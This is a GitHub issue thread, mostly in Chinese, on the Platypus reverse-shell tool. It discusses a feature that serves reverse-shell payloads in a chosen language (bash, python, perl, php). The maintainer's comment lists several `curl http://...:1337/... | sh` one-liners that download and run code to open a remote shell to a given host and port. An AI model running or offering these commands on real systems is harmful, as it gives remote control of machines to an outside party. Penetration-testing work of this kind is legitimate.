### ISSUE TITLE
[Feature Request] 多语言反弹 shell 支持

### ISSUE THREAD

**Issue by RicterZ** [WangYihang/Platypus#30]
比如 `curl platypus:8080/a.py` 就返回 python 的反弹 shell 代码，`.../a.pl` 就返回 perl 的。

**Comment by WangYihang** [comment]
诶好主意！感谢反馈！俺等会儿整一下，rr 师带带我 >v<

**Comment by WangYihang** [comment]
Added. @RicterZ ，感谢师傅提出建议！
Examples:
```
curl http://192.168.1.3:1337/ | sh
curl http://192.168.1.3:1337/bash | sh
curl http://192.168.1.3:1337/python | sh
curl http://192.168.1.3:1337/perl | sh
curl http://192.168.1.3:1337/1.2.3.4/7331 | sh
curl http://192.168.1.3:1337/1.2.3.4/7331/bash | sh
curl http://192.168.1.3:1337/1.2.3.4/7331/python | sh
curl http://192.168.1.3:1337/1.2.3.4/7331/php | sh
```
![RaaS support specifying a language](https://user-images.githubusercontent.com/16917636/105578798-b7df5100-5dbd-11eb-9e41-660a62228f1b.gif)

**Comment by WangYihang** [comment]
[v1.2.6](https://github.com/WangYihang/Platypus/releases/tag/v1.2.6) released for this issue.
